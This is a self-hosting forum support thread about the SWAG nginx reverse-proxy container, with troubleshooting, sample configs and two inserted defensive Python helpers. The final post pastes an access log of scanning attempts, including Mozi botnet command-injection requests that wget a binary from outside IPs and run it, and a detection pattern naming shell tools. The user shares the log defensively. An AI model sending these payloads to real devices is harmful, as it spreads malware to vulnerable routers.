[Support] Linuxserver.io - SWAG - Secure Web Application Gateway (Nginx/PHP/Certbot/Fail2ban)



2 hours ago, Ryguy said:

With the latest update, unfortunately all of my reverse proxies are no longer working.

I have it configured to use my own domain, and there is a CNAME associated to each subdomain. My dynamic DNS is resolved with DuckDNS, and I have all of the relevant containers set on proxynet along with the SWAG container.

My logs show that the Server is ready, however it is flagging that the Prox-conf files are out of date. Could this be causing the issue? Did the templates change materially?

The containers in use are Bitwardenrs, Nextcloud, and OMbi

Same with me ... I had my server down for like 3 weeks (I had my mainboard in warranty) and everything worked: plex, gitea, sonarr, deluge, nextcloud ... finally I had all of them working and now all are down again

Funny thing now as an exception for other not working dates (misconfiguration of swag/pipeline until swag) is that swag is validating the certificate for everything domain and the above mentioned subdomains but I am still getting Bad Gateway ...

Link to post

22 minutes ago, alexandru360 said:

 

Same with me ... I had my server down for like 3 weeks (I had my mainboard in warranty) and everything worked: plex, gitea, sonarr, deluge, nextcloud ... finally I had all of them working and now all are down again

Funny thing now as an exception for other not working dates (misconfiguration of swag/pipeline until swag) is that swag is validating the certificate for everything domain and the above mentioned subdomains but I am still getting Bad Gateway ...

After some further investigation I had these lines in my swag log:

**** The following reverse proxy confs have different version dates than the samples that are shipped. ****
**** This may be due to user customization or an update to the samples. ****
**** You should compare them to the samples in the same folder to make sure you have the latest updates. ****
/config/nginx/proxy-confs/sonarr.subdomain.conf
/config/nginx/proxy-confs/plex.subdomain.conf
/config/nginx/proxy-confs/openvpn-as.subdomain.conf
/config/nginx/proxy-confs/nextcloud.subdomain.conf
/config/nginx/proxy-confs/gitea.subdomain.conf

I will investigate and come back with results ...

Edited by alexandru360
Link to post
5 minutes ago, alexandru360 said:

 

After some further investigation I had these lines in my swag log:

**** The following reverse proxy confs have different version dates than the samples that are shipped. ****
**** This may be due to user customization or an update to the samples. ****
**** You should compare them to the samples in the same folder to make sure you have the latest updates. ****
/config/nginx/proxy-confs/sonarr.subdomain.conf
/config/nginx/proxy-confs/plex.subdomain.conf
/config/nginx/proxy-confs/openvpn-as.subdomain.conf
/config/nginx/proxy-confs/nextcloud.subdomain.conf
/config/nginx/proxy-confs/gitea.subdomain.conf

I will investigate and come back with results ...

 

Nope ... I backed up all my configs, reset everything to default, cloned only deluge[...].conf and restarted swag and for subdomains I get Bad Gateway ... If someone has an idea I'll be all eyes ...

Just a thought: 
I saw on another thread here a response from 2019 that Nerd Pack might interfere with swag "mojo" ... is this still the case?

Link to post
1 hour ago, alexandru360 said:

 

Nope ... I backed up all my configs, reset everything to default, cloned only deluge[...].conf and restarted swag and for subdomains I get Bad Gateway ... If someone has an idea I'll be all eyes ...

Just a thought: 
I saw on another thread here a response from 2019 that Nerd Pack might interfere with swag "mojo" ... is this still the case?

I’m in the same boat. Same log warnings. Can’t figure this out at all. 

Link to post
5 hours ago, alexandru360 said:

 

Nope ... I backed up all my configs, reset everything to default, cloned only deluge[...].conf and restarted swag and for subdomains I get Bad Gateway ... If someone has an idea I'll be all eyes ...

Just a thought: 
I saw on another thread here a response from 2019 that Nerd Pack might interfere with swag "mojo" ... is this still the case?

Any luck sorting this out???

Link to post
On 1/23/2021 at 5:54 AM, Ryguy said:

Any luck sorting this out???

 

I uninstalled Nerd Tools ... completely deleted SWAG, reinstalled, made all the configurations again and still Bad Gateway ... but the main domain works ... I am confused ... I think I have to investigate what Bad Gateway means for Nginx

Link to post
3 hours ago, alexandru360 said:

 

I uninstalled Nerd Tools ... completely deleted SWAG, reinstalled, made all the configurations again and still Bad Gateway ... but the main domain works ... I am confused ... I think I have to investigate what Bad Gateway means for Nginx

It means nginx can't connect to the service. So you either have the name/IP/port wrong or not in the same custom bridge as nginx.

Link to post
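A way to tell the two causes in the answer above apart (unresolvable name versus unreachable IP/port), as an added example that is not part of the thread or of SWAG itself. It assumes the shipped proxy confs set the target with `set $upstream_app` / `set $upstream_port`, also accepts a literal `proxy_pass http://ip:port`, and the names `upstream_targets` and `probe` are illustrative.

```python
import re
import socket

# Constructed sample in the variable style of SWAG's shipped proxy confs (assumed format).
SAMPLE_CONF = """
server {
    server_name sonarr.*;
    location / {
        set $upstream_app sonarr;
        set $upstream_port 8989;
        set $upstream_proto http;
        proxy_pass $upstream_proto://$upstream_app:$upstream_port;
    }
}
"""

VAR = re.compile(r"^\s*set\s+\$upstream_(app|port)\s+(\S+?);", re.M)
LITERAL = re.compile(r"^\s*proxy_pass\s+https?://([^\s:/;$]+):(\d+)", re.M)


def upstream_targets(conf_text):
    """Return the (host, port) pairs nginx will try to reach for this conf."""
    targets = [(host, int(port)) for host, port in LITERAL.findall(conf_text)]
    found = dict(VAR.findall(conf_text))
    if {"app", "port"} <= found.keys():
        targets.append((found["app"], int(found["port"])))
    return targets


def probe(host, port, timeout=3.0):
    """Report which of the two 502 causes applies to this upstream."""
    try:
        addr = socket.getaddrinfo(host, port, type=socket.SOCK_STREAM)[0][4]
    except socket.gaierror:
        return "name does not resolve: wrong name, or not on the same custom bridge"
    try:
        with socket.create_connection(addr[:2], timeout=timeout):
            return "reachable"
    except OSError as exc:
        return f"resolves to {addr[0]} but connect failed ({exc}): wrong IP/port"


if __name__ == "__main__":
    for host, port in upstream_targets(SAMPLE_CONF):
        print(f"{host}:{port} -> {probe(host, port)}")
```

Container names only resolve from inside the same user-defined Docker network, so the probe is meaningful only when run from a container attached to the network SWAG is on.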

Hi all---I replaced my cache drives the other day and found when I turned the dockers back on that nothing was listed at all. So I added back in my templates and that seemed to work just fine save my swag docker.

Long story short, I ended up renaming the entire /config folder (which was a LONG time in use from very early letsencrypt days) and seeing if a complete reinstall worked. Got caught with the rate limit of letsencrypt. Is there a way I can move over the certs that were generated in the old /config structure? Thanks!

 

RESOLVED:  In case anyone comes across this I came across a thread about CA Backup/Restore and completely forgot the app was running on my system.  Did a restore of everything and it's working perfectly now.

Edited by talmania
Link to post
1 hour ago, Moka said:

Hi,
I created a Cloudflare Origin Certificates pem and key. Which folder do I need to put them in?

For what? This container handles getting the certs.

Link to post
1 hour ago, saarg said:

For what? This container handles getting the certs.

 

I want to use Swag with Cloudflare in Full (strict).

 

When I enable Full (strict), I get Invalid SSL certificate.

 

Any idea how to fix that?


Edited by Moka
Link to post

Does anyone know if it's possible to use SWAG and point it to a VM, not to a docker container at all?

Looking at the sample configuration, it seems all the info is pointing to a docker container. Is it possible to have it point to a VM instead for hosting other non docker applications?

Is it even possible or does this only work for containers?

 

 

Link to post
1 hour ago, brent3000 said:

Does anyone know if it's possible to use SWAG and point it to a VM, not to a docker container at all?

Looking at the sample configuration, it seems all the info is pointing to a docker container. Is it possible to have it point to a VM instead for hosting other non docker applications?

Is it even possible or does this only work for containers?

 

 

Not entirely sure what you mean, but I reverse proxy sites on multiple vm's and containers on a second unraid using a single instance of swag. It all depends on how your network is set up. If you can access the site using a lan ip and port on a web browser, you likely can reverse proxy it for wan access.

Link to post
2 minutes ago, jonathanm said:

but I reverse proxy sites on multiple vm's and containers on a second unraid using a single instance of swag.

This is what I'm after,

 

If I have a VM running a website (which is accessed via a local IP), what/how do I build a config or setup so SWAG will direct vm1.domain.com to a VM?

All the sample ones are container based examples? Or do I just put the VM name in its place?

Link to post
1 minute ago, brent3000 said:

This is what I'm after,

 

If I have a VM running a website (which is accessed via a local IP), what/how do I build a config or setup so SWAG will direct vm1.domain.com to a VM?

All the sample ones are container based examples? Or do I just put the VM name in its place?

I don't use the samples, I just set things up like a normal nginx install. I learned from tutorials I searched in google. My personal preference is to keep my sites all in one main config file, with common blocks for repeated lines defined in other config files I reference. My install doesn't follow the included examples.

Link to post
17 hours ago, Moka said:

 

I want to use Swag with Cloudflare in Full (strict).

 

When I enable Full (strict), I get Invalid SSL certificate.

 

Any idea how to fix that?


 

I don't know what full mode is, but if you need to use certs you get from cloudflare, then I don't think it's possible with swag.

 

Join our discord and you can ask there, as there are more people with more knowledge about swag.

Link to post

Hi guys, I hope someone can help me with this because I've been banging my head against a wall for hours trying to figure out what is going wrong:

 

I followed Spaceinvader One's video on setting up a reverse proxy in unraid, but whenever I attempt to go to any of the addresses that should be pointed to my docker containers I end up at the SWAG landing page ("Welcome to your SWAG instance"). Any thoughts?

 

I really hope it is something obvious, but I've a bad feeling it isn't ... Please probe if I haven't given enough information.

Link to post
On 2/1/2020 at 6:03 AM, Coolsaber57 said:

I am trying to expose my Octoprint page, but am having trouble finding a configuration that will work.  

 

Here's the examples that Octoprint provides: https://community.octoprint.org/t/reverse-proxy-configuration-examples/1107

 

Here's my current config:

 


server {
    listen 443 ssl;
    listen [::]:443 ssl;

    server_name print.*;

    include /config/nginx/ssl.conf;

    client_max_body_size 0;

    location / {
        include /config/nginx/proxy.conf;
        proxy_pass http://192.168.2.13:80;
        proxy_set_header Host $http_host;
        proxy_set_header Upgrade $http_upgrade;
        proxy_set_header Connection "upgrade";
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
        proxy_set_header X-Scheme $scheme;

    }

}

I took out a few lines that were causing the docker container to throw errors.  I'm currently getting a 500 error.  If I copy a config from another container and change the IP/port/subdomain, I do actually get to see the login page, but it says it's offline and asks me to reconnect.

 

Has anyone successfully configured Octoprint in this container? If so, would you be able to share the config?

 

In the following 50 pages, it seems that there is still no solution to this? (I'm running into the same problem)

Link to post
On 1/30/2021 at 4:32 AM, SockDust said:

I followed Spaceinvader One's video on setting up a reverse proxy in unraid, but whenever I attempt to go to any of the addresses that should be pointed to my docker containers I end up at the SWAG landing page ("Welcome to your SWAG instance"). Any thoughts?

Is there a specific app you are trying to route to? I also followed SI YouTube and it worked a treat. Have you checked the log that the domain is clearing correctly, or what method are you using (folder or domain level)?

Link to post

Hi all,

 

Over the weekend I set up swag and nextcloud, following spaceinvaderone's guides (https://scan.nextcloud.com/ gives all A+). I got everything working using my own domain (nexcloud.mydomain.com). I'm not a specialist, so I'm not very confident about the security. So, I decided to let it run for about 20hrs, then check the logs and enter the IPs on abuseipdb.com. I filtered all my activities out and am left with 158 lines in the nginx log. Here is an example:

https://www.abuseipdb.com/check/74.120.14.53
https://www.abuseipdb.com/check/180.163.220.5
https://www.abuseipdb.com/check/180.163.220.68
https://www.abuseipdb.com/check/27.115.124.70
https://www.abuseipdb.com/check/192.241.215.11

 

Next, some lines, of which none are from my IPs.

I understand the GET background, logo, etc. But kerbynet and wget from some IP don't sound good.

GET / HTTP/1.1
GET /config/getuser?index=0 HTTP/1.1
POST /GponForm/diag_Form?images/ HTTP/1.1
/tmp/gpon80&ipv=0
POST /boaform/admin/formLogin HTTP/1.1
 400 0 -
GET /portal/redlion HTTP/1.1
HEAD http://112.124.42.80:63435/ HTTP/1.1
CONNECT 112.124.42.80:443 HTTP/1.1
HEAD http://110.242.68.4/ HTTP/1.1
CONNECT 110.242.68.4:443 HTTP/1.1
POST /HNAP1/ HTTP/1.0
\x16\x03\x01\x00\x8B\x01\x00\x00\x87\x03\x03\x11\xDFJ\x5CN\x8F\xA0\x89[\x9A\x84i=\x8A\x8FA\xEB\x98\xE3\xDB\xFDQ\xD1Iw\xFD\xED
HEAD /robots.txt HTTP/1.0
GET /login HTTP/1.1
GET /config/getuser?index=0 HTTP/1.1
GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://45.229.54.251:50078/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
GET /actuator/health HTTP/1.1
GET /config/getuser?index=0 HTTP/1.1
OPTIONS / HTTP/1.1
HEAD /epa/scripts/win/nsepa_setup.exe HTTP/1.1
HEAD / HTTP/1.0
GET /cgi-bin/kerbynet?Action=Render&Object=StartSession HTTP/1.1
@\x00\x00\x00y0\x12\xD9\x9E9Q\x90\x8A\xED\xEE`\xCC\xB3\xD6|
\x03\x00\x00/*\xE0\x00\x00\x00\x00\x00Cookie: mstshash=Administr
GET /hudson HTTP/1.1
GET /config/getuser?index=0 HTTP/1.1
GET /config/getuser?index=0 HTTP/1.1
GET /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f HTTP/1.1
GET /shell?cd+/tmp;rm+-rf+*;wget+http://59.99.138.110:45592/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
GET / HTTP/2.0 http://baidu.com/
GET /login HTTP/2.0 http://baidu.com/
GET / HTTP/2.0 
GET /login HTTP/2.0 
GET /apps/files_rightclick/css/app.css?v=46c85d58-8 HTTP/2.0
GET /core/css/guest.css?v=c3182750-8 HTTP/2.0
GET /apps/files_videoplayer/js/main.js?v=c3182750-8 HTTP/2.0
GET /core/js/dist/files_fileinfo.js?v=c3182750-8 HTTP/2.0
GET /core/js/dist/files_client.js?v=c3182750-8 HTTP/2.0
GET /apps/files_sharing/js/dist/main.js?v=c3182750-8 HTTP/2.0
GET /apps/files_pdfviewer/js/files_pdfviewer-public.js?v=c3182750-8 HTTP/2.0
GET /apps/files_rightclick/js/script.js?v=c3182750-8 HTTP/2.0
GET /apps/files_rightclick/js/files.js?v=c3182750-8 HTTP/2.0
GET /apps/theming/js/theming.js?v=c3182750-8 HTTP/2.0
GET /core/js/dist/main.js?v=c3182750-8 HTTP/2.0
GET /core/js/dist/login.js?v=c3182750-8 HTTP/2.0
GET /js/core/merged-template-prepend.js?v=c3182750-8 HTTP/2.0
GET /core/js/oc.js?v=c3182750 HTTP/2.0
GET /apps/theming/styles?v=8 HTTP/2.0
GET /apps/theming/image/logo?useSvg=1&v=8 HTTP/2.0
GET /apps/accessibility/css/user-a82fd95db10ff25dfad39f07372ebe37 HTTP/2.0
GET /core/img/actions/confirm-white.svg?v=2 HTTP/2.0
GET /core/img/loading-dark.gif HTTP/2.0
GET /core/img/actions/toggle.svg HTTP/2.0
GET /apps/theming/image/logo?v=8 HTTP/2.0
GET /csrftoken HTTP/2.0
GET /apps/theming/image/background?v=8 HTTP/2.0
GET /csrftoken HTTP/2.0
GET /apps/theming/favicon?v=8 HTTP/1.1
GET /csrftoken HTTP/2.0

 

Are there some obvious things I forgot to do?

Considering the IP locations, geo blocking wouldn't be a bad idea. I don't leave the country much, so blocking about the whole world except 2/3 countries would probably be an option.

 

Thanks,

 

edit: found something on geo blocking https://technicalramblings.com/blog/blocking-countries-with-geolite2-using-the-letsencrypt-docker-container/

ofc, running into issues, I'm missing something very obvious.

Edited by ZekerPixels
Link to post
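A triage pass over request lines like the ones in the post above, as an added example that is not part of the thread. It separates traffic the Nextcloud vhost is expected to serve from background scanning, assuming the vhost fronts only Nextcloud; the path allowlist and function names are illustrative, and the last sample line is constructed with a documentation IP.

```python
import re
from collections import Counter

# Constructed sample: request fields taken from the quoted log, last entry constructed.
SAMPLE_REQUESTS = [
    "GET /login HTTP/2.0",
    "GET /core/css/guest.css?v=c3182750-8 HTTP/2.0",
    "POST /GponForm/diag_Form?images/ HTTP/1.1",
    "GET /cgi-bin/kerbynet?Action=Render&Object=StartSession HTTP/1.1",
    "POST /HNAP1/ HTTP/1.0",
    "CONNECT 112.124.42.80:443 HTTP/1.1",
    "HEAD http://110.242.68.4/ HTTP/1.1",
    r"\x03\x00\x00/*\xE0\x00\x00\x00\x00\x00Cookie: mstshash=Administr",
    "GET /setup.cgi?todo=syscmd&cmd=wget+http://203.0.113.5/x HTTP/1.0",
]

REQ = re.compile(r"^(?P<method>[A-Z]+) (?P<target>\S+) HTTP/\d(?:\.\d)?")
# Assumption: only Nextcloud sits behind this server block, so this is the expected traffic.
APP_PREFIXES = ("/core/", "/apps/", "/js/", "/login", "/csrftoken", "/robots.txt")
SHELL_TOKENS = re.compile(r"(?:^|[;+&=/])(?:wget|curl|chmod|sh|rm)(?:[+;&]|$)")


def classify(request):
    """Put one logged request line into a coarse triage bucket."""
    m = REQ.match(request)
    if not m:
        return "non-http"  # raw bytes (escaped by nginx) sent to the HTTP listener
    method, target = m["method"], m["target"]
    if method == "CONNECT" or target.lower().startswith(("http://", "https://")):
        return "proxy-probe"  # client is testing whether the server relays traffic
    path, _, query = target.partition("?")
    if SHELL_TOKENS.search(query):
        return "command-injection"  # shell commands smuggled in the query string
    if path == "/" or path.startswith(APP_PREFIXES):
        return "expected"
    return "foreign-path"  # well-formed request for something Nextcloud does not serve


def summarize(requests):
    """Count requests per bucket."""
    return Counter(classify(r) for r in requests)


if __name__ == "__main__":
    for bucket, count in summarize(SAMPLE_REQUESTS).most_common():
        print(f"{count:3d}  {bucket}")
```

Everything outside the "expected" bucket asks for something this server does not host, so grouping those buckets by source IP gives a concrete list to weigh against fail2ban or geo-blocking rules.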
